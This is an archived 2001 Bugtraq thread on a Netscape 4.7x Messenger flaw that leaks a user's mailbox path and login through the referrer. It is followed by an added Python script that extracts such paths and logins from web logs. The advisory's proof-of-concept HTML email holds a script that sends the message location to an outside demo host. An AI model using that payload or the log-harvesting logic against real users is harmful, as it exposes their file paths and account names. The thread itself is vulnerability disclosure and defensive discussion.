6585078 2001-06-05 16:01 +0400 /94 lines/ 3APA3A <3APA3A@SECURITY.NNOV.RU>
Sent by: joel@lysator.liu.se
Imported: 2001-06-05 20:46 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: 3APA3A@SECURITY.NNOV.RU
Recipient: Bugtraq (import) <17263>
Subject: SECURITY.NNOV: Netscape 4.7x Messenger user information retrieval
------------------------------------------------------------
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: bugtraq@securityfocus.com
Message-ID: <9825131987.20010605160119@SECURITY.NNOV.RU>

Hello bugtraq,

There are known bugs in Netscape which require information on the location of
the user's files. This bug is not a serious one, but it allows getting this
location.

Topic                    : Netscape 4.7x user information retrieval
Author                   : 3APA3A <3APA3A@security.nnov.ru>
Affected software        : Netscape 4.7x All Platforms
Vendor                   : Netscape (IPlanet)
Risk                     : Low
Remotely Exploitable     : Yes
Released                 : 30 May 2001
Vendor URL               : http://www.netscape.com
SECURITY.NNOV advisories : http://www.security.nnov.ru/advisories

Background:

Netscape Messenger uses an internal protocol called mailbox://. The format of a
mailbox URI is

mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber

This URI contains the full path to the user's mailbox, which usually contains
the user's login name and, in the case of Windows 9x, the path to the Netscape
installation. It is impossible to determine this location from JavaScript
inside an e-mail message, because Netscape hides document.location from
JavaScript.

Problem:

It is possible to retrieve the mailbox:// URI of the message. E.g., it is
possible to retrieve the mailbox location, the user's system login and in some
cases the path to the Netscape installation.

Details:

When a link is invoked from a message, Netscape sets the "document.referrer"
property to the URI of the message containing this link. JavaScript on the
target page is able to retrieve this property and pass it to any location,
together with the IP of the calling machine.
Exploitation:

If you read this message with Netscape Messenger you can simply click the link
http://www.security.nnov.ru/files/nsdemo.asp to see your mailbox location, or
you can force a Netscape user to open this page with a message like this:

-=-=-=-=-=-=-=-=-=-
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html

<html><script>
window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
</script>
<A HREF="http://www.security.nnov.ru/files/nsdemo.asp" >
http://www.security.nnov.ru/files/nsdemo.asp
</A>
</html>
-=-=-=-=-=-=-=-=-=-

Vendor:

Netscape was contacted May 30, 2001 via
http://help.netscape.com/forms/bug-security.html
No feedback was given.

--
http://www.security.nnov.ru
         /\_/\
        { . . }     |\
+--oQQo->{ ^ }<-----+ \
|  3APA3A  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)

(6585078) /3APA3A <3APA3A@SECURITY.NNOV.RU>/--------

6586627 2001-06-06 06:34 +0200 /35 lines/ Mads Peter Bach <mpb@bugtraq.logout.sh>
Sent by: joel@lysator.liu.se
Imported: 2001-06-06 08:04 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17289>
Comment on text 6585078 by 3APA3A <3APA3A@SECURITY.NNOV.RU>
Subject: Re: SECURITY.NNOV: Netscape 4.7x Messenger user information retrieval
------------------------------------------------------------
From: Mads Peter Bach <mpb@bugtraq.logout.sh>
To: bugtraq@securityfocus.com
Message-ID: <3B1DB2DD.EC409A76@bugtraq.logout.sh>

3APA3A wrote:

[snip]
> Background:
>
> Netscape Messenger uses an internal protocol called mailbox://. The
> format of a mailbox URI is
>
> mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber
>
> This URI contains the full path to the user's mailbox, which usually
> contains the user's login name and, in the case of Windows 9x, the path
> to the Netscape installation. It is impossible to determine this location
> from JavaScript inside an e-mail message, because Netscape hides
> document.location from JavaScript.
>
> Problem:
>
> It is possible to retrieve the mailbox:// URI of the message. E.g., it is
> possible to retrieve the mailbox location, the user's system login and in
> some cases the path to the Netscape installation.
>

This vulnerability only affects the user's local (on the client machine)
mailbox. If a user keeps his mail on an IMAP server, the referer will show up
as an IMAP:// URL.

Workaround: Don't use POP3, and keep your mail on an IMAP server.

/Mads

(6586627) /Mads Peter Bach <mpb@bugtraq.logout.sh>/(reflowed)

6604867 2001-06-09 11:21 -0400 /32 lines/ Greg A. Woods <woods@weird.com>
Sent by: joel@lysator.liu.se
Imported: 2001-06-11 01:54 by Brevbäraren
External recipient: Andrew Gerweck <gerweck@yahoo.com>
External CC recipient: bugtraq@securityfocus.com
External replies to: woods@weird.com
Recipient: Bugtraq (import) <17358>
Comment on text 6599219 by Andrew Gerweck <gerweck@yahoo.com>
Subject: RE: SECURITY.NNOV: Netscape 4.7x Messenger user information retrieval
------------------------------------------------------------
From: woods@weird.com (Greg A. Woods)
To: Andrew Gerweck <gerweck@yahoo.com>
Cc: bugtraq@securityfocus.com
Message-ID: <20010609152133.79624117@proven.weird.com>

[ On Thursday, June 7, 2001 at 11:47:06 (-0700), Andrew Gerweck wrote: ]
> Subject: RE: SECURITY.NNOV: Netscape 4.7x Messenger user information retrieval
>
> Doesn't security by obscurity have some value?

Quite the opposite when it misleads people into a false sense of security.

> I'm trying to avoid a flamewar by repeating: obscurity is not a good
> security policy. It is often useful to treat it as completely
> valueless. I'm simply suggesting that it's not valueless in all
> cases, and we understand unnecessary information disclosure to
> represent a security problem, instead of dismissing it.

It's only of value when its full implications are understood completely by
those using it.
Sometimes the best place to hide something *is* in plain view, but if you
don't know that's what you're actually doing then you may not have hidden it
properly at all.

--
Greg A. Woods
+1 416 218-0098  VE3TCP  <gwoods@acm.org>  <woods@robohack.ca>
Planix, Inc. <woods@planix.com>;  Secrets of the Weird <woods@weird.com>

(6604867) /Greg A. Woods <woods@weird.com>/(reflowed)

6604908 2001-06-10 11:57 -0400 /46 lines/ Thomas Corriher <tcorriher@earthlink.net>
Sent by: joel@lysator.liu.se
Imported: 2001-06-11 02:36 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: gerweck@yahoo.com
External replies to: tcorriher@earthlink.net
Recipient: Bugtraq (import) <17361>
Comment on text 6599219 by Andrew Gerweck <gerweck@yahoo.com>
Subject: RE: SECURITY.NNOV: Netscape 4.7x Messenger user information retrieval
------------------------------------------------------------
From: Thomas Corriher <tcorriher@earthlink.net>
To: <bugtraq@securityfocus.com>
Cc: <gerweck@yahoo.com>
Message-ID: <Pine.LNX.4.33.0106101144360.14526-100000@desktop>

On Thu, 7 Jun 2001, Andrew Gerweck wrote:

> From: Andrew Gerweck <gerweck@yahoo.com>
> To: bugtraq@securityfocus.com
> Subject: RE: SECURITY.NNOV: Netscape 4.7x Messenger user information
>     retrieval
> Date: Thu, 7 Jun 2001 11:47:06 -0700 (PDT)
>
> > does not qualify as an exploit. This information would seem
> > useful only if we believed that security through obscurity had
> > merit. Compound this with the fact that most people are not even
>
> Doesn't security by obscurity have some value?
>
> In my opinion, it's naive to think that it's okay for software to
> disclose unnecessary information about its users. While obscurity
> alone is hardly a good security policy, it's one tool in a toolbox
> that can help keep a system secure.

I am corrected. You are correct that I should not have made a blanket
statement about obscurity in all cases.
I think most of us would agree that the less information an attacker is given
the better. Perhaps I should have said security through obscurity should not
be relied upon, but it can add an extra "layer" of security. Anything that
makes an attacker's work more difficult must have some merit.

Don't worry about a "flame war". My ego isn't that big, and I hope that the
same applies to all the other readers here. Mailing lists lose their
usefulness when people are afraid to participate in the discussion.

--
Thomas Corriher
Home Phone: 1-704-921-2470
Mobile Phone: 1-704-737-2038
Use Linux? Get counted at http://counter.li.org/

(6604908) /Thomas Corriher <tcorriher@earthlink.net>/
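The following is an added example and is not part of the Bugtraq thread above or of any code by its authors. It takes the two technical points of the thread, 3APA3A's description of the mailbox:// URI format (mailbox://full_path_to_user_folder?ID=...&number=...) and Mads Peter Bach's note that IMAP users show up with an imap:// referer instead, and shows what a web server operator would actually see in a Referer field and which pieces of it are sensitive. The log lines, paths, account names, the Windows drive prefix form (C|/) and the imap://user@server form are all constructed assumptions for illustration; the login-name guess is a heuristic of this example, not something the advisory specifies.

```python
"""Classify Referer values of the kind the advisory describes (added example)."""
import re

# Combined Log Format: pull out the client address and the Referer field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

# Message URI as described in the advisory: scheme://folder?ID=...&number=...
MAIL_URI_RE = re.compile(
    r'^(?P<scheme>mailbox|imap)://(?P<folder>[^?]*)(?:\?(?P<query>.*))?$',
    re.IGNORECASE,
)

# Constructed sample log (not real traffic): three Netscape clients that
# followed a link from a message, plus one ordinary web referer.
SAMPLE_LOG = r'''
10.0.0.5 - - [05/Jun/2001:16:01:19 +0400] "GET /files/nsdemo.asp HTTP/1.0" 200 512 "mailbox:///home/alice/nsmail/Inbox?ID=<msg1@example.org>&number=1234" "Mozilla/4.76 [en] (X11; U; Linux 2.4.2 i686)"
10.0.0.6 - - [05/Jun/2001:16:02:03 +0400] "GET /files/nsdemo.asp HTTP/1.0" 200 512 "mailbox://C|/Program%20Files/Netscape/Users/bob/mail/Inbox?ID=<msg2@example.org>&number=77" "Mozilla/4.7 [en] (Win98; U)"
10.0.0.7 - - [05/Jun/2001:16:03:44 +0400] "GET /files/nsdemo.asp HTTP/1.0" 200 512 "imap://carol@imap.example.org/INBOX?ID=<msg3@example.org>&number=9" "Mozilla/4.77 [en] (X11; U; Linux)"
10.0.0.8 - - [05/Jun/2001:16:04:10 +0400] "GET /files/nsdemo.asp HTTP/1.0" 200 512 "http://www.example.org/page.html" "Mozilla/4.77 [en] (X11; U; Linux)"
'''


def parse_query(query):
    """Split 'ID=x&number=y' into a dict; values are kept as they appear."""
    out = {}
    for part in (query or "").split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key] = value
    return out


def guess_login(folder):
    """Heuristic (this example's assumption): the account name is the path
    component that follows a home/ or Users/ directory."""
    m = re.search(r'(?:^|/)(?:home|users)/([^/]+)/', folder, re.IGNORECASE)
    return m.group(1) if m else None


def analyse_referer(referer):
    """Describe what a single Referer value discloses about the mail client."""
    m = MAIL_URI_RE.match(referer)
    if not m:
        return {"kind": "none"}
    scheme = m.group("scheme").lower()
    folder = m.group("folder")
    params = parse_query(m.group("query"))
    info = {
        "kind": scheme,
        "folder": folder,
        "message_id": params.get("ID"),
        "login": guess_login(folder),
    }
    if scheme == "mailbox":
        # Local mailbox: the filesystem path itself is disclosed. A drive
        # prefix (constructed here as C|/ or C:/) means the path to the
        # Netscape installation is disclosed as well, as the advisory notes.
        info["windows_install_path"] = re.match(r'^[A-Za-z][:|]/', folder) is not None
    else:
        # IMAP case from Mads Peter Bach's reply: no local path, but the
        # account and server names are still visible (user@server assumed).
        m2 = re.match(r'^(?:([^@/]+)@)?([^/]+)', folder)
        info["login"] = m2.group(1) if m2 else None
        info["server"] = m2.group(2) if m2 else None
    return info


def scan_log(text):
    """Run analyse_referer over every parseable log line, tagging the client IP."""
    results = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = analyse_referer(m.group("referer"))
        result["ip"] = m.group("ip")
        results.append(result)
    return results


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r)
```

Running the script prints one record per visitor: the two mailbox:// clients reveal a local folder path (and, for the Windows one, the installation directory) plus a guessed login, the imap:// client reveals only account and server, and the plain http:// referer is reported as carrying no mail information. The same classification can be pointed at a real access log to find out whether any of one's own users are exposing local paths through this behaviour.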